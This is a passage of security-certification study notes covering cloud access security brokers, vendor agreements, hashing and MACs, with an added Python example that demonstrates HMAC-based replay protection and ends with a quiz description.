  • Adds a third-party security layer to the interactions that users have with cloud services
  • Broker intercepts traffic between the user and the cloud service, monitoring for security issues
  • Broker may not be able to block requests, depending upon API capabilities

Vendor Security

  • Ensure that vendor security policies are at least as stringent as your own
  • Vendor lock-in makes it difficult to switch vendors down the road. So be careful

Service Level Agreements (SLA)

  • Document specific requirements that a customer has about any aspect of a vendor's service performance

Memorandum of Understanding (MOU)

  • Commonly used when a legal dispute is unlikely but customer and vendor wish to document their relationship to avoid future misunderstanding
  • Usually used when one department of a company is dealing with another department

Statement of Work (SOW)

  • Statement of Work (SOW) is used when a specific new project or piece of work comes up under an existing vendor relationship
  • SOW is governed by the terms in the MSA; it is like an addendum that scopes one piece of work

Asymmetric Encryption

  • Keys used for asymmetric encryption and decryption (public and private) must be from the same key pair: what one key encrypts, only the other key can decrypt

Hash Functions

  • One-way function that transforms a variable-length input into a fixed-length output
  • Output of a hash function will always be the same length regardless of input size
  • It should be computationally infeasible to find two inputs that produce the same output (collision resistance)
  • All criteria above must be met to have an effective hash function
  • You must know which functions are considered insecure (MD5, SHA-1) and which remain secure (the SHA-2 and SHA-3 families)

Message Authentication Code (MAC)

  • Create and verify message authentication code by using a secret key in conjunction with a hash function
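The Replay Attack, Hash Functions and Message Authentication Code sections above fit together in one piece of code, so the block below serves all three. It is an added example, not part of the study notes: it checks the fixed-length and avalanche properties of SHA-256, builds an HMAC over a message together with a nonce and a timestamp, and shows a server rejecting a replayed token, a tampered message and a stale one. The key, messages, clock values and function names are constructed assumptions for the demonstration.

```python
# Added example (not from the study notes): hash properties, HMAC, and
# replay protection with a nonce and a timestamp.
import hashlib
import hmac
import os


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fixed_length_and_avalanche():
    """Return (output length is fixed, hex digits that differ between the
    hashes of two near-identical messages)."""
    same_length = len(sha256_hex(b"a")) == len(sha256_hex(b"a" * 10_000)) == 64
    h1, h2 = sha256_hex(b"transfer 100"), sha256_hex(b"transfer 101")
    differing = sum(x != y for x, y in zip(h1, h2))
    return same_length, differing


def _mac(key: bytes, message: bytes, nonce: bytes, timestamp: int) -> bytes:
    # Binding nonce and timestamp into the MAC is what stops an attacker
    # from reusing a captured token or moving it to a different context.
    return hmac.new(key, b"%d|%s|%s" % (timestamp, nonce.hex().encode(), message),
                    hashlib.sha256).digest()


def make_token(key: bytes, message: bytes, nonce: bytes, timestamp: int) -> dict:
    """Client side: the token the server will verify."""
    return {"message": message, "nonce": nonce, "timestamp": timestamp,
            "mac": _mac(key, message, nonce, timestamp)}


class Server:
    """Verifies tokens; a nonce is accepted at most once within the window."""

    def __init__(self, key: bytes, window_seconds: int = 300):
        self.key = key
        self.window = window_seconds
        self.seen_nonces = set()

    def accept(self, token: dict, now: int) -> str:
        if abs(now - token["timestamp"]) > self.window:
            return "stale"            # outside the window; nonce need not be kept forever
        if token["nonce"] in self.seen_nonces:
            return "replay"           # captured token being resent
        expected = _mac(self.key, token["message"], token["nonce"], token["timestamp"])
        if not hmac.compare_digest(expected, token["mac"]):
            return "bad mac"          # message, nonce or timestamp was altered
        self.seen_nonces.add(token["nonce"])
        return "ok"


def replay_demo():
    """Legitimate use, then replay, tampering and an expired token."""
    key = os.urandom(32)              # constructed shared secret
    server = Server(key)
    now = 1_700_000_000               # constructed clock value
    token = make_token(key, b"transfer 100 to acct 42", os.urandom(16), now)
    first = server.accept(token, now + 1)
    replayed = server.accept(token, now + 2)          # attacker resends the capture
    tampered = dict(token, message=b"transfer 900 to acct 42", nonce=os.urandom(16))
    forged = server.accept(tampered, now + 3)         # new nonce, but MAC no longer matches
    old = make_token(key, b"transfer 5", os.urandom(16), now - 3600)
    expired = server.accept(old, now)
    return first, replayed, forged, expired
```

The replay bullet said a captured encrypted token can be reused without being decrypted; the nonce set and the timestamp window are the two checks that make the captured bytes worthless, and the MAC is what prevents the attacker from simply minting a fresh nonce for an altered message.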

AI in Security

  • Logging data for a company can be overwhelming; artificial intelligence can help solve security data overload across sources such as:
  • Firewall log
  • Web server log
  • Database log
  • Router log

Social Engineering Awareness

  • Manipulating people into divulging information or performing an action that undermines security.
  • Provides users with the knowledge they need to protect the organization's security

Quiz Team

Description

Test your knowledge of ethics violations, security protocols like multi-factor authentication, and the importance of adhering to software licensing agreements. Also covers attack methods and cloud security, with a focus on Cloud Access Security Brokers (CASB).
